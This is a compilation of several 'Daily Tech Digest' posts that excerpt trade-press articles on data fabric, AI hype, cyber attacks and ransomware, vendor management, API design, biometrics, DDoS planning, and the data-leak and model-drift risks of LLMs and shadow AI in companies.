Data fabric technologies excel in integrating and managing data across various environments. However, they often focus on conventional data sources like databases, data lakes, or data warehouses. The result is a gap in integrating and extracting value from data residing in numerous SaaS applications, as they may not seamlessly fit into these traditional data repositories. The combined solution of data fabric and iPaaS can address complex business challenges, such as integrating data from SaaS applications with traditional data sources. This capability is particularly valuable in today’s business landscape, where data is increasingly scattered across various cloud and on-premises environments. The merging of data fabric and iPaaS technologies offers a groundbreaking solution to this challenge, opening the door to new opportunities in data management and analysis. The integration of data fabric with iPaaS addresses the complexity and expertise-dependency in iPaaS. Data fabric can enable users to discover, understand, and verify data before integration flows are built. 


AI’s moment of disillusionment

AI, whether generative AI, machine learning, deep learning, or you name it, was never going to be able to sustain the immense expectations we’ve foisted upon it. I suspect part of the reason we’ve let it run so far for so long is that it felt beyond our ability to understand. It was this magical thing, black-box algorithms that ingest prompts and create crazy-realistic images or text that sounds thoughtful and intelligent. And why not? The major large language models (LLMs) have all been trained on gazillions of examples of other people being thoughtful and intelligent, and tools like ChatGPT mimic back what they’ve “learned.” ... We go through this process of inflated expectations and disillusionment with pretty much every shiny new technology. Even something as settled as cloud keeps getting kicked around. My InfoWorld colleague, David Linthicum, recently ripped into cloud computing, arguing that “the anticipated productivity gains and cost savings have not materialized, for the most part.” I think he’s overstating his case, but it’s hard to fault him, given how much we (myself included) sold cloud as the solution for pretty much every IT problem.


How nation-state cyber attacks disrupt public services and undermine citizen trust

While nation-states do have advanced capabilities and visibility that are hard or impossible for cyber criminals to replicate, the general strategy for attackers is to target vulnerable perimeter devices such as VPNs or firewalls as an entry point to the network. Next they focus on obtaining privileged credentials while leveraging legitimate software to masquerade as normal activity while they scout the environments for valuable data or large repositories to disrupt. It’s important to note that the commonly exploited vulnerabilities in government IT systems are not distinctly different from the vulnerabilities exploited more broadly. Government IT systems are often extremely diverse and thus, subject to a variety of exploits. ... Currently, there are numerous policies and regulations, both domestically and internationally, which are inconsistent and vary in their requirements. These administrative requirements take significant resources which could otherwise be used to strengthen a company’s cybersecurity program. 


How Quantum Computing Will Revolutionize Cloud Analytics

As we peer into the future of quantum computing in cloud analytics, the emphasis on collaboration and continuous innovation becomes undeniable. Integrating quantum technologies with cloud systems is not just a technological upgrade but a paradigm shift requiring robust partnerships across academia, industry, and government sectors. For instance, IBM’s quantum network includes over 140 members, including start-ups, research labs, and educational institutions, working together to advance quantum computing. This collaborative model is essential because the challenges in quantum computing are not just about hardware or software alone but about creating an ecosystem that supports an entirely new kind of computing. That ecosystem comprises components such as quantum hardware development, quantum algorithms, software tools, and educational resources. Also, it has made significant achievements, such as developing quantum hardware such as the IBM Quantum System One, advancing quantum algorithms for practical applications in chemistry and materials science, and creating the Qiskit software development kit to make quantum programming more accessible.


How continuous learning is reshaping the workforce

Gone are the days when lengthy training programs were sought after and people took breaks from their careers to pick up an upskilling program. Navpreet Singh highlights that upskilling will become an ongoing process integrated into the workday. “The focus will shift from acquiring specific job skills to fostering adaptability and lifelong learning. Critical thinking, problem-solving, and creativity will be paramount as automation takes over routine tasks. Traditional ways of learning may not always reflect the skills needed. Alternative credentials, like badges and micro-credentials, will showcase the specific skills employees possess, making them more competitive. By embracing this future of upskilling, we can ensure our workforce is adaptable, future-proof, and ready to drive innovation in the ever-evolving automotive industry,” explains Singh. Within the next decade or so, we will see greater demand for agile ed-tech tools that help employees learn on the go and prepare them for new roles, says Daniele Merlerati, Chief Regional Officer APAC, Baltics, Benelux at Gi Group Holding.



Quote for the day:

"Perseverance is failing nineteen times and succeeding the twentieth." -- Julie Andrews

Daily Tech Digest - July 01, 2024

The dangers of voice fraud: We can’t detect what we can’t see

The inherent imperfections in audio offer a veil of anonymity to voice manipulations. A slightly robotic tone or a static-laden voice message can easily be dismissed as a technical glitch rather than an attempt at fraud. This makes voice fraud not only effective but also remarkably insidious. Imagine receiving a phone call from a loved one’s number telling you they are in trouble and asking for help. The voice might sound a bit off, but you attribute this to the wind or a bad line. The emotional urgency of the call might compel you to act before you think to verify its authenticity. Herein lies the danger: Voice fraud preys on our readiness to ignore minor audio discrepancies, which are commonplace in everyday phone use. Video, on the other hand, provides visual cues. There are clear giveaways in small details like hairlines or facial expressions that even the most sophisticated fraudsters have not been able to get past the human eye. On a voice call, those warnings are not available. That’s one reason most mobile operators, including T-Mobile, Verizon and others, make free services available to block — or at least identify and warn of — suspected scam calls.


Provider or partner? IT leaders rethink vendor relationships for value

Vendors achieve partner status in McDaniel’s eyes by consistently demonstrating accountability and integrity; getting ahead of potential issues to ensure there’s no interruptions or problems with the provided products or services; and understanding his operations and objectives. ... McDaniel, other CIOs, and CIO consultants agree that IT leaders don’t need to cultivate partnerships with every vendor; many, if not most, can remain as straight-out suppliers, where the relationship is strictly transactional, fixed-fee, or fee-for-service based. That’s not to suggest those relationships can’t be chummy, but a good personal rapport between the IT team and the supplier’s team is not what partnership is about. A provider-turned-partner is one that gets to know the CIO’s vision and brings to the table ways to get there together, Bouryng says. ... As such, a true partner is also willing to say no to proposed work that could take the pair down an unproductive path. It’s a sign, Bouryng says, that the vendor is more interested in reaching a successful outcome than merely scheduling work to do.


In the AI era, data is gold. And these companies are striking it rich

AI vendors have, sometimes controversially, made deals with organizations like news publishers, social media companies, and photo banks to license data for building general-purpose AI models. But businesses can also benefit from using their own data to train and enhance AI to assist employees and customers. Examples of source material can include sales email threads, historical financial reports, geographic data, product images, legal documents, company web forum posts, and recordings of customer service calls. “The amount of knowledge—actionable information and content—that those sources contain, and the applications you can build on top of them, is really just mindboggling,” says Edo Liberty, founder and CEO of Pinecone, which builds vector database software. Vector databases store documents or other files as numeric representations that can be readily mathematically compared to one another. That’s used to quickly surface relevant material in searches, group together similar files, and feed recommendations of content or products based on past interests. 


Machine Vision: The Key To Unleashing Automation's Full Potential

Machine vision is a class of technologies that process information from visual inputs such as images, documents, computer screens, videos and more. Its value in automation lies in its ability to capture and process large quantities of documents, images and video quickly and efficiently in quantities and speeds far in excess of human capability. ... Machine vision based technologies are even becoming central to the creation of automations themselves. For example, instead of relying on human workers to describe processes that are being automated when designing automations, recordings of the process to be automated are created and then machine vision software, combined with other technologies, is used to capture the process end-to-end and then provide the input to automating a lot of the work needed to program the digital workers (bots). ... Machine vision is integral to maximizing the impact of advanced automation technologies on business operations and paving the way for increased capabilities in the automation space.


Put away your credit cards — soon you might be paying with your face

Biometric purchases using facial recognition are beginning to gain some traction. The restaurant CaliExpress by Flippy, a fully automated fast-food restaurant, is an early adopter. Whole Food stores offer pay-by-palm, an alternative biometric to facial recognition. Given that they are already using biometrics, facial recognition is likely to be available in their stores at some point in the future. ... Just as credit and debit cards have overtaken cash as the dominant means to make purchases, biometrics like facial recognition could eventually become the dominant way to make purchases. There will however be actual costs during such a transition, which will largely be absorbed by consumers in higher prices. The technology software and hardware required to implement such systems will be costly, pushing it out of reach for many small- and medium-size businesses. However, as facial recognition systems become more efficient and reliable, and losses from theft are reduced, an equilibrium will be achieved that will make such additional costs more modest and manageable to absorb.


Technologists must be ready to seize new opportunities

For technologists, this new dynamic represents a profound (and daunting) change. They’re being asked to report on application performance in a more business-focussed, strategic way and to engage in conversations around experience at a business level. They’re operating outside their comfort zone, far beyond the technical reporting and discussions they’ve previously encountered. Of course, technologists are used to rising to a challenge and pivoting to meet the changing needs of their organisations and their senior leaders. We saw this during the pandemic, many will (rightly) be excited about the opportunity to expand their skills and knowledge, and to elevate their standing within their organisations. The challenge that many technologists face, however, is that they currently don’t have the tools and insights they need to operate in a strategic manner. Many don’t have full visibility across their hybrid environments and they’re struggling to manage and optimise application availability, performance and security in an effective and sustainable manner. They can’t easily detect issues, and even when they do, it is incredibly difficult to quickly understand root causes and dependencies in order to fix issues before they impact end user experience. 


Vulnerability management empowered by AI

Using AI will take vulnerability management to the next level. AI not only reduces analysis time but also effectively identifies threats. ... AI-driven systems can identify patterns and anomalies that signify potential vulnerabilities or attacks. Converting the logs into data and charts will make analysis simpler and quicker. Incidents should be identified based on the security risk, and notification should take place for immediate action. Self-learning is another area where AI can be trained with data. This will enable AI to be up-to-date on the changing environment and capable of addressing new and emerging threats. AI will identify high-risk threats and previously unseen threats. Implementing AI requires iterations to train the model, which may be time-consuming. But over time, it becomes easier to identify threats and flaws. AI-driven platforms constantly gather insights from data, adjusting to shifting landscapes and emerging risks. As they progress, they enhance their precision and efficacy in pinpointing weaknesses and offering practical guidance.


Why every company needs a DDoS response plan

Given the rising number of DDoS attacks each year and the reality that DDoS attacks are frequently used in more sophisticated hacking attempts to apply maximum pressure on victims, a DDoS response plan should be included in every company’s cybersecurity tool kit. After all, it’s not just a temporary lack of access to a website or application that is at risk. A business’s failure to withstand a DDoS attack and rapidly recover can result in loss of revenue, compliance failures, and impacts on brand reputation and public perception. Successful handling of a DDoS attack depends entirely on a company’s preparedness and execution of existing plans. Like any business continuity strategy, a DDoS response plan should be a living document that is tested and refined over the years. It should, at the highest level, consist of five stages, including preparation, detection, classification, reaction, and postmortem reflection. Each phase informs the next, and the cycle improves with each iteration.


Reduce security risk with 3 edge-securing steps

Over the past several years web-based SSL VPNs have been targeted and used to gain remote access. You may even want to consider evaluating how your firm allows remote access and how often your VPN solution has been attacked or at risk. ... “The severity of the vulnerabilities and the repeated exploitation of this type of vulnerability by actors means that NCSC recommends replacing solutions for secure remote access that use SSL/TLS with more secure alternatives,” the authority says. “The NCSC recommends internet protocol security (IPsec) with internet key exchange (IKEv2). Other countries’ authorities have recommended the same.” ... Pay extra attention to how credentials that need to be accessed are protected from unauthorized access. Ensure that you use best practice processes to secure passwords and ensure that each user has appropriate passwords and access accordingly. ... When using cloud services, you need to ensure that only those vendors you trust or that you have thoroughly vetted have access to your cloud services. 

The real key to machine learning success is something that is mostly missing from genAI: the constant tuning of the model. “In ML and AI engineering,” Shankar writes, “teams often expect too high of accuracy or alignment with their expectations from an AI application right after it’s launched, and often don’t build out the infrastructure to continually inspect data, incorporate new tests, and improve the end-to-end system.” It’s all the work that happens before and after the prompt, in other words, that delivers success. For genAI applications, partly because of how fast it is to get started, much of this discipline is lost. ... As with software development, where the hardest work isn’t coding but rather figuring out which code to write, the hardest thing in AI is figuring out how or if to apply AI. When simple rules need to yield to more complicated rules, Valdarrama suggests switching to a simple model. Note the continued stress on “simple.” As he says, “simplicity always wins” and should dictate decisions until more complicated models are absolutely necessary.



Quote for the day:

“The vision must be followed by the venture. It is not enough to stare up the steps - we must step up the stairs.” -- Vance Havner

Daily Tech Digest - February 08, 2024

The do-it-yourself approach to MDM

If you’re comfortable taking on extra responsibilities and costs, the next big question is whether you can get the right tool — or more often, many tools — you need. This is where you need a detailed understanding of the mobile platforms you have to manage and every platform that needs to integrate with them for everything to work. MDM isn’t an island. It integrates with a sometimes staggering number of enterprise components. Some, like identity management, are obvious; others like log management or incident response are less obvious when you think about successful mobility management. Then there are the external platforms that need connections. Think identity management — Entra, Workspace, Okta — and things like Apple Business Manager that you need to work well in both every day and unusual situations. Then tack on the network, security, auditing, load balancing, inventory, the help desk and various other services. You’re going to need something to connect with everything you already have, or you could find yourself saddled with multiple migrations. 


NCSC warns CNI operators over ‘living-off-the-land’ attacks

The NCSC said that even organisations with the most mature cyber security techniques could easily fail to spot a living-off-the-land attack, and assessed it is “likely” that such activity poses a clear threat to CNI in the UK. ... In particular, it warned, both Chinese and Russian hackers have been observed living-off-the-land on compromised CNI networks – one prominent exponent of the technique is the GRU-sponsored advanced persistent threat (APT) actor known as Sandworm, which uses LOLbins extensively to attack targets in Ukraine. “It is vital that operators of UK critical infrastructure heed this warning about cyber attackers using sophisticated techniques to hide on victims’ systems,” said NCSC operations director Paul Chichester. “Threat actors left to carry out their operations undetected present a persistent and potentially very serious threat to the provision of essential services. Organisations should apply the protections set out in the latest guidance to help hunt down and mitigate any malicious activity found on their networks.” "In this new dangerous and volatile world where the frontline is increasingly online, we must protect and future proof our systems,” added deputy prime minister Oliver Dowden.


What Are the Core Principles of Good API Design?

Your API should also be idiomatic to the programming language it is written against and respect the way that language works. For example, if the API is to be used with Java, use exceptions for errors, rather than returning an error code as you might in C. APIs should follow the principle of least surprise. Part of the way this can be achieved is through symmetry; if you have to add and remove methods, these should be applied everywhere they are appropriate. A good API comprises a small number of concepts; if I’m learning it, I shouldn’t have to learn too many things. This doesn’t necessarily apply to the number of methods, classes or parameters, but rather the conceptual surface area that the API covers. Ideally, an API should only set out to achieve one thing. It is also best to avoid adding anything for the sake of it. “When in doubt, leave it out,” as Bloch puts it. You can usually add something to an API if it turns out to be needed, but you can never remove things once an API is public. As noted earlier, your API will need to evolve over time, so a key part of the design is to be able to make changes further down the line without destroying everything.


Russian Ransomware Gang ALPHV/BlackCat Resurfaces with 300GB of Stolen US Military Documents

The ALPHV/BlackCat ransomware group has threatened to publish and sell 300 GB of stolen military documents unless Technica Corporation gets in touch. “If Technica does not contact us soon, the data will either be sold or made public,” the ransomware gang threatened. However, there is no guarantee that the ransomware gang would not pass the military documents to adversaries even after the military contractor pays the ransom. The BlackCat ransomware gang also posted screenshots of the leaked military documents as proof, displaying the victims’ names, social security numbers, job roles and locations, and clearance levels. Other military documents include corporate information such as billing invoices and contracts for private companies and federal agencies such as the FBI and the US Air Force. So far, the motive of the cyber attack remains unknown, but it’s common for threat actors to feign financial motives to conceal their true geopolitical objectives. While the leaked military documents may not classified, they still contain crucial personal information that state-linked threat actors could use for targeting.


6 best practices for better vendor management

To build a stronger relationship with vendors, “CIOs should bring them into the fold regarding their priorities and potential concerns about what may —or may not — lie ahead, from a regulatory perspective or the general economic climate, for example,” says Kevin Beasley, CIO at VAI, a midmarket ERP software developer. “A few years ago, supply-chain snags had CIOs looking for new technology,” Beasley says. “Lately, a talent shortage means CIOs are pushing for more automation. CIOs that don’t delay posing questions about how vendor products can solve such challenges, but also take the time to hear the information, will build a valuable rapport that can benefit both parties.” Part of building a collaborative partnership is staying in close contact. It’s important to establish clear communication channels and schedule regular check-ins with active vendors, “to understand performance, expectations, and progress while recognizing that no process or service goes perfectly all the time,” says Patrick Gilgour, managing director of the Technology Strategy and Advisory practice at consulting firm Protiviti.


Three commitments of the data center industry for 2024

To become more authentic and credible in these reputation-building dialogues and go beyond the data center, we must be more representative of the people our infrastructure ultimately serves. Although progress has been made, we must keep evolving. We need diversity of background, experience, ethnicity, age, and outlook in order to fully embrace the challenges of digital infrastructure. The range of roles, skillsets, and opportunities in the sector is far wider than many outside the industry recognize. Creating organizations where every person can be themselves, and deliver in line with their ethics, values, and beliefs is a prerequisite for building a positive reputation. And of course, the more attractive an industry we become, the more great candidates, partners, and supporters we’ll attract. ... Speaking of inspiring the next generation, 2024 can be the year in which we embrace youth. How do we attract more young people into the industry? By inspiring them. The data center sector is a dynamic, exciting, and rapidly growing sector. We want to ensure this is being effectively articulated in print, across social media, and online.


Is your cloud security strategy ready for LLMs?

When employees and contractors use those public models, especially for analysis, they will be feeding those models internal data. The public models then learn from that data and may leak those sensitive corporate secrets to a rival who asks a similar question. “Mitigating the risk of unauthorized use of LLMs, especially inadvertent or intentional input of proprietary, confidential, or material non-public data into LLMs” is tricky, says George Chedzhemov, BigID’s cybersecurity strategist. Cloud security platforms can help, he adds, especially for access controls and user authentication, encryption of sensitive data, data loss prevention, and network security. Other tools are available for data discovery and surfacing sensitive information in structured, unstructured, and semi-structured repositories. “ It is impossible to protect data that the organization has lost track of, data that has been over-permissioned, or data that the organization is not even aware exists, so data discovery should be the first step in any data risk remediation strategy, including one that attempts to address AI/LLM risks,” says Chedzhemov.


Shadow AI poses new generation of threats to enterprise IT

Functional risks stem from an AI tool's ability to function properly. For example, model drift is a functional risk. It occurs when the AI model falls out of alignment with the problem space it was trained to address, rendering it useless and potentially misleading. Model drift might happen because of changes in the technical environment or outdated training data. ... Operational risks endanger the company's ability to do business. Operational risks come in many forms. For example, a shadow AI tool could give bad advice to the business because it is suffering from model drift, was inadequately trained or is hallucinating -- i.e., generating false information. Following bad advice from GenAI can result in wasted investments -- for example, if the business expands unwisely -- and higher opportunity costs -- for example, if it fails to invest where it should. ... Legal risks follow functional and operational risks if shadow AI exposes the company to lawsuits or fines. Say the model advises leadership on business strategy. But the information is incorrect, and the company wastes a huge amount of money doing the wrong thing. Shareholders might sue.


Creating a Data Quality Framework

A start-up business may not initially have a need for organizing massive amounts of data (it doesn’t yet have massive amounts of data to organize), but a master data management (MDM) program at the start can be remarkably useful. Master data is the critical information needed for doing business accurately and efficiently. For example, the business’s master data contains, among other things, the correct addresses of the start-up’s new customers. Master data must be accurate to be useful – the use of inaccurate master data would be self-destructive. If the organization is doing business internationally, it may need to invest in a Data Governance (DG) program to deal with international laws and regulations. Additionally, a Data Governance program will manage the availability, integrity, and security of the business’s data. An effective DG program ensures that data is consistent and trustworthy and doesn’t get misused. A well-designed DG program includes not only useful software, but policies and procedures for humans handling the organization’s data. A Data Quality framework is normally developed and used when an organization has begun using data in complicated ways for research purposes. 


Meta Is Being Urged to Crack Down on UK Payment Scams

Since social media market platforms such as Facebook Marketplace do not have dedicated payment portals that accept payment cards, Davis said, standard security practices adopted by card issuers cannot be used to protect customers. As a result, preventing fraud on social media platforms is a challenge, he said. "To tackle this, we need greater action from Meta to stop fraudulent ads from being put in front of the U.K. consumers," Davis said. Meta Public Policy Mead Philip Milton, who testified before the committee, said his company takes fraud prevention "extremely seriously." Milton said Meta has adopted such measures as verifying ads on its platforms and permitting only financial ads that have cleared the U.K. Financial Services Verification process rolled out by the British Financial Conduct Authority. "A good indicator of fraud is fake accounts, as scammers generally tend to use fake accounts to carry out scams. As fraud prevention, Meta removed 827 million fake accounts in the third quarter of 2023," Milton said. Microsoft Government Affairs Director Simon Staffell said the computing giant pursues criminal infrastructure disruption as one of its fraud prevention strategies.



Quote for the day:

"If you are willing to do more than you are paid to do, eventually you will be paid to do more than you do." -- Anonymous